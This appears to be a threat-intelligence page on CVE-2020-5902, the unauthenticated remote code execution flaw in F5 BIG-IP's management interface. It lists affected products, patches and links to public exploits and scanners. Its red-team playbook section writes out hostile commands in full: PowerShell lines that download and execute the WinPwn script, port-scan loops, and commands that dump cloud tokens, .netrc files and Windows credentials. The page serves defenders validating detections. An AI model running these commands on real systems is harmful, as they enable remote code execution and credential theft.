CVE-2020-5902
Overview
This vulnerability is a remote code execution flaw rooted in improper input validation within the Traffic Management User Interface (TMUI) of BIG-IP. The affected component fails to adequately sanitize user-supplied input on certain undisclosed web pages, enabling attackers to inject and execute arbitrary commands remotely without authentication. The issue primarily arises from unsafe handling of requests in the TMUI's web-based configuration utility, exposing internal command interfaces.
Vulnerability Description
In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
Impact
An unauthenticated attacker can execute arbitrary system commands remotely on the BIG-IP device by exploiting this vulnerability, gaining full control over the affected system. This enables unauthorized access to sensitive configuration data, potential disruption of network traffic management, and lateral movement within the network infrastructure. The exploit requires no user interaction or credentials, making it highly accessible and dangerous for operational continuity and data confidentiality.
Solution
F5 Networks has released security updates addressing this vulnerability in BIG-IP versions 15.1.0.4 and later, 14.1.2.6 and later, 13.1.3.4 and later, 12.1.5.2 and later, and 11.6.5.2 and later. Administrators should apply these vendor-provided patches as detailed in the F5 advisory article K52145254 (https://support.f5.com/csp/article/K52145254). No alternative workarounds are recommended; immediate patching is advised to mitigate exploitation risk.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
BackdoorDiplomacy
|
MEDIUM | — | correlation_mitre |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability present in specific versions of BIG-IP's Traffic Management User Interface (TMUI) allows for remote code execution (RCE) through undisclosed pages. This critical flaw arises from improper validation of user input, enabling an attacker to send crafted requests that can execute arbitrary commands on the server. The affected versions span a range of releases, indicating a widespread potential for exploitation across various deployments. The severity of this vulnerability is underscored by its high CVSS score of 9.8, which categorizes it as critical, necessitating immediate attention from organizations using the affected products.
Attack vectors for this vulnerability are particularly concerning due to the nature of the TMUI, which is typically accessible over the internet or internal networks. An attacker could exploit this flaw by sending specially crafted HTTP requests to the vulnerable interface, potentially leading to full system compromise. Scenarios may include an attacker gaining administrative access to the system, allowing them to manipulate configurations, exfiltrate sensitive data, or deploy further malicious payloads. The ability to execute arbitrary code remotely makes this vulnerability a prime target for threat actors, especially in environments where BIG-IP is utilized for critical application delivery and security functions.
The real-world impact of this vulnerability can be profound, especially for organizations that rely on BIG-IP for load balancing, application delivery, and security. Successful exploitation could lead to significant business risks, including data breaches, service disruptions, and reputational damage. Organizations may face regulatory scrutiny and financial penalties if sensitive data is compromised. Moreover, the potential for lateral movement within a network following initial exploitation could allow attackers to pivot to other critical systems, amplifying the overall risk and impact on the organization’s infrastructure.
To detect and mitigate this vulnerability, organizations should prioritize immediate patching of affected systems to the latest versions provided by the vendor. Regular vulnerability assessments and penetration testing can help identify potential exploitation paths and ensure that security controls are effective. Additionally, implementing network segmentation and strict access controls can reduce the attack surface, limiting the exposure of the TMUI to untrusted networks. Monitoring logs for unusual access patterns or anomalies in user behavior can also aid in early detection of exploitation attempts. Organizations should consider employing Web Application Firewalls (WAFs) to filter and monitor HTTP traffic to the TMUI, providing an additional layer of protection against crafted requests.
In conclusion, the remote code execution vulnerability in the TMUI of specific BIG-IP versions poses a significant threat to organizations utilizing these products. The combination of high severity, potential for exploitation, and real-world impact necessitates a proactive approach to security. By implementing robust detection and mitigation strategies, organizations can safeguard their systems against the risks associated with this vulnerability, ensuring the integrity and availability of their critical applications and services.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the CVE-2020-5902 vulnerability within F5 BIG-IP systems. Our telemetry indicates a sustained increase in malicious activity leveraging this critical remote code execution flaw, underscoring persistent adversary interest despite prior mitigation efforts. Notably, ransomware groups linked to BackdoorDiplomacy continue to exploit this vulnerability as part of their campaigns, reinforcing its role as a favored vector for initial access and lateral movement. Although the EPSS score remains high and stable, the uptick in observed exploitation attempts signals an elevated operational tempo among threat actors. This development heightens the risk posture for organizations running affected BIG-IP versions, as the vulnerability remains actively targeted with publicly available proof-of-concept tools facilitating exploitation. Consequently, defenders should consider this a significant escalation in the threat landscape, warranting increased vigilance and prioritization in detection and response strategies.
Update 2 — July 08, 2026
CSURFACE threat intelligence has detected a modest increase in exploitation attempts targeting the CVE-2020-5902 vulnerability, accompanied by the emergence of new publicly available proof-of-concept tools that simplify attack automation. This subtle rise in adversary activity, combined with the expanded exploit toolkit, indicates a sustained interest from threat actors, including ransomware-linked groups such as BackdoorDiplomacy, in leveraging this critical remote code execution flaw. Although the overall probability of exploitation remains consistently high, the diversification and accessibility of exploitation resources contribute to a broader attack surface and lower the barrier for less sophisticated actors to conduct successful intrusions. Consequently, the threat level associated with CVE-2020-5902 should be viewed as persistently elevated, underscoring the continued operational relevance of this vulnerability within the current cyber threat landscape.
Affected Products (84)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
F5 | Big-Ip Access Policy Manager | All |
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Access Policy Manager | All |
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Access Policy Manager | All |
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Access Policy Manager | All |
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Access Policy Manager | All |
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Access Policy Manager | All |
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Firewall Manager | All |
cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Firewall Manager | All |
cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Firewall Manager | All |
cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Firewall Manager | All |
cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Firewall Manager | All |
cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Firewall Manager | All |
cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Web Application Firewall | All |
cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Web Application Firewall | All |
cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Web Application Firewall | All |
cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Web Application Firewall | All |
cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Web Application Firewall | All |
cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Web Application Firewall | All |
cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Analytics | All |
cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Analytics | All |
cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
F5 BIG-IP TMUI Directory Traversal and File Upload RCE
exploits/linux/http/f5_bigip_tmui_rce_cve_2020_5902
|
Mikhail Klyuchnikov, wvu | Unknown | - | View |
ExploitDB (3)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion | Carlos E. Vieira | webapps | hardware | - | View |
| BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI' Remote Code Execution | Critical Start | webapps | linux | - | View |
| BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI' Remote Code Execution (PoC) | Budi Khoirudin | webapps | linux | - | View |
GitHub PoCs (57)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
jas502n/CVE-2020-5902
CVE-2020-5902 BIG-IP
|
jas502n | 374 | 109 | 2020-07-05 | View |
|
yassineaboukir/CVE-2020-5902
Proof of concept for CVE-2020-5902
|
yassineaboukir | 71 | 25 | 2020-07-05 | View |
|
theLSA/f5-bigip-rce-cve-2020-5902
F5 BIG-IP RCE CVE-2020-5902 automatic check tool
|
theLSA | 62 | 17 | 2020-07-10 | View |
|
aqhmal/CVE-2020-5902-Scanner
Automated script for F5 BIG-IP scanner (CVE-2020-5902) using hosts retrieved from Shodan API.
|
aqhmal | 55 | 22 | 2020-07-05 | View |
|
yasserjanah/CVE-2020-5902
exploit code for F5-Big-IP (CVE-2020-5902)
|
yasserjanah | 43 | 15 | 2020-07-06 | View |
|
dunderhay/CVE-2020-5902
Python script to exploit F5 Big-IP CVE-2020-5902
|
dunderhay | 36 | 8 | 2020-07-06 | View |
|
f5devcentral/cve-2020-5902-ioc-bigip-checker
|
f5devcentral | 17 | 12 | 2020-07-20 | View |
|
zhzyker/CVE-2020-5902
F5 BIG-IP 任意文件读取+远程命令执行RCE
|
zhzyker | 13 | 8 | 2020-07-08 | View |
|
PushpenderIndia/CVE-2020-5902-Scanner
Automated F5 Big IP Remote Code Execution (CVE-2020-5902) Scanner Written In Python 3
|
PushpenderIndia | 12 | 7 | 2020-08-09 | View |
|
lijiaxing1997/CVE-2020-5902-POC-EXP
批量扫描CVE-2020-5902,远程代码执行,已测试
|
lijiaxing1997 | 10 | 8 | 2020-07-06 | View |
|
ar0dd/CVE-2020-5902
POC code for checking for this vulnerability. Since the code has been released, I decided to release this one as well. P...
|
ar0dd | 12 | 2 | 2020-07-05 | View |
|
nsflabs/CVE-2020-5902
|
nsflabs | 8 | 6 | 2020-07-05 | View |
|
Al1ex/CVE-2020-5902
CVE-2020-5902
|
Al1ex | 10 | 3 | 2020-07-11 | View |
|
west9b/F5-BIG-IP-POC
CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 POC集合
|
west9b | 10 | 2 | 2022-05-28 | View |
|
sv3nbeast/CVE-2020-5902_RCE
|
sv3nbeast | 8 | 3 | 2020-07-06 | View |
|
MrCl0wnLab/checker-CVE-2020-5902
Checker CVE-2020-5902: BIG-IP versions 15.0.0 through 15.1.0.3, 14.1.0 through 14.1.2.5, 13.1.0 through 13.1.3.3, 12.1.0...
|
MrCl0wnLab | 5 | 5 | 2020-07-10 | View |
|
d4rk007/F5-Big-IP-CVE-2020-5902-mass-exploiter
F5 Big-IP CVE-2020-5902 mass exploiter/fuzzer.
|
d4rk007 | 4 | 6 | 2020-07-09 | View |
|
rwincey/CVE-2020-5902-NSE
|
rwincey | 8 | 2 | 2020-07-05 | View |
|
rockmelodies/CVE-2020-5902-rce-gui
GUI
|
rockmelodies | 8 | 1 | 2020-07-17 | View |
|
jiansiting/CVE-2020-5902
F5 BIG-IP Scanner (CVE-2020-5902)
|
jiansiting | 4 | 5 | 2020-07-07 | View |
|
dwisiswant0/CVE-2020-5902
CVE-2020-5902
|
dwisiswant0 | 9 | 0 | 2020-07-04 | View |
|
corelight/CVE-2020-5902-F5BigIP
A network detection package for CVE-2020-5902, a CVE10.0 vulnerability affecting F5 Networks, Inc BIG-IP devices.
|
corelight | 4 | 4 | 2020-07-28 | View |
|
GovindPalakkal/EvilRip
It is a small script to fetch out the subdomains/ip vulnerable to CVE-2020-5902 written in bash
|
GovindPalakkal | 6 | 0 | 2020-07-08 | View |
|
34zY/APT-Backpack
cve-2019-11510, cve-2019-19781, cve-2020-5902, cve-2021-1497, cve-2021-20090, cve-2021-22006, cve-2021-2...
|
34zY | 3 | 1 | 2022-12-13 | View |
|
DeepSecurity-Pe/GoF5-CVE-2020-5902
Script para validar CVE-2020-5902 hecho en Go.
|
DeepSecurity-Pe | 2 | 2 | 2020-07-09 | View |
|
cybersecurityworks553/scanner-CVE-2020-5902
CVE-2020-5902 scanner
|
cybersecurityworks553 | 2 | 1 | 2020-07-06 | View |
|
murataydemir/CVE-2020-5902
[CVE-2020-5902] F5 BIG-IP Remote Code Execution (RCE)
|
murataydemir | 2 | 1 | 2020-08-13 | View |
|
faisalfs10x/F5-BIG-IP-CVE-2020-5902-shodan-scanner
simple bash script of F5 BIG-IP TMUI Vulnerability CVE-2020-5902 checker
|
faisalfs10x | 2 | 1 | 2021-02-04 | View |
|
z3n70/CVE-2020-5902
BIGIP CVE-2020-5902 Exploit POC and automation scanning vulnerability
|
z3n70 | 2 | 1 | 2022-07-07 | View |
|
haisenberg/CVE-2020-5902
Auto exploit RCE CVE-2020-5902
|
haisenberg | 1 | 2 | 2021-04-13 | View |
|
r0ttenbeef/cve-2020-5902
cve-2020-5902 POC exploit
|
r0ttenbeef | 2 | 0 | 2020-07-06 | View |
|
Shu1L/CVE-2020-5902-fofa-scan
|
Shu1L | 1 | 1 | 2020-07-09 | View |
|
jinnywc/CVE-2020-5902
CVE-2020-5902
|
jinnywc | 1 | 1 | 2020-07-06 | View |
|
halencarjunior/f5scan
F5 BIG IP Scanner for CVE-2020-5902
|
halencarjunior | 1 | 1 | 2020-07-08 | View |
|
qiong-qi/CVE-2020-5902-POC
批量检测CVE-2020-5902
|
qiong-qi | 2 | 0 | 2020-07-10 | View |
|
JSec1337/RCE-CVE-2020-5902
BIG-IP F5 Remote Code Execution
|
JSec1337 | 1 | 0 | 2020-07-06 | View |
|
0xAbdullah/CVE-2020-5902
Python script to check CVE-2020-5902 (F5 BIG-IP devices).
|
0xAbdullah | 1 | 0 | 2020-07-06 | View |
|
renanhsilva/checkvulnCVE20205902
A powershell script to check vulnerability CVE-2020-5902 of ip list
|
renanhsilva | 1 | 0 | 2020-07-08 | View |
|
amitlttwo/CVE-2020-5902
In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic ...
|
amitlttwo | 1 | 0 | 2023-02-07 | View |
|
k3nundrum/CVE-2020-5902
|
k3nundrum | 0 | 1 | 2020-07-07 | View |
|
flyopenair/CVE-2020-5902
Exploits for CVE-2020-5902 POC
|
flyopenair | 0 | 1 | 2020-07-11 | View |
|
freeFV/CVE-2020-5902-fofa-scan
|
freeFV | 0 | 1 | 2020-07-12 | View |
|
momika233/cve-2020-5902
|
momika233 | 0 | 1 | 2020-07-12 | View |
|
superzerosec/cve-2020-5902
|
superzerosec | 0 | 1 | 2020-08-18 | View |
|
0xBlackash/CVE-2020-5902
CVE-2020-5902
|
0xBlackash | 0 | 1 | 2026-03-16 | View |
|
wdlid/CVE-2020-5902-fix
Fix CVE-2020-5902
|
wdlid | 0 | 1 | 2020-07-07 | View |
|
qlkwej/poc-CVE-2020-5902
dummy poc
|
qlkwej | 1 | 0 | 2020-07-06 | View |
|
Zinkuth/F5-BIG-IP-CVE-2020-5902
|
Zinkuth | 1 | 0 | 2020-07-06 | View |
|
DevRafaelprogrammer/F5-BIG-IP
O F5 BIG-IP é uma plataforma de entrega e segurança de aplicações amplamente utilizada em ambientes corporativos. A CVE-...
|
DevRafaelprogrammer | 0 | 0 | 2026-07-01 | View |
|
GoodiesHQ/F5-Patch
Patch F5 appliance CVE-2020-5902
|
GoodiesHQ | 0 | 0 | 2020-07-06 | View |
|
Any3ite/CVE-2020-5902-F5BIG
|
Any3ite | 0 | 0 | 2020-07-07 | View |
|
inho28/CVE-2020-5902-F5-BIGIP
Scan from a given list for F5 BIG-IP and check for CVE-2020-5902
|
inho28 | 0 | 0 | 2020-07-07 | View |
|
cristiano-corrado/f5_scanner
F5 mass scanner and CVE-2020-5902 checker
|
cristiano-corrado | 0 | 0 | 2020-07-07 | View |
|
ajdumanhug/CVE-2020-5902
POC
|
ajdumanhug | 0 | 0 | 2020-07-07 | View |
|
dnerzker/CVE-2020-5902
|
dnerzker | 0 | 0 | 2020-07-08 | View |
|
ludy-dev/BIG-IP-F5-TMUI-RCE-Vulnerability
(CVE-2020-5902) BIG IP F5 TMUI RCE Vulnerability RCE PoC/ Test Script
|
ludy-dev | 0 | 0 | 2020-09-09 | View |
|
TheCyberViking/CVE-2020-5902-Vuln-Checker
Simple Vulnerability Checker Wrote by me "@TheCyberViking" and A fellow Researcher who wanted to be left Nameless... you...
|
TheCyberViking | 0 | 0 | 2020-07-09 | View |
Ransomware Groups 1
Threat Feed
35 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.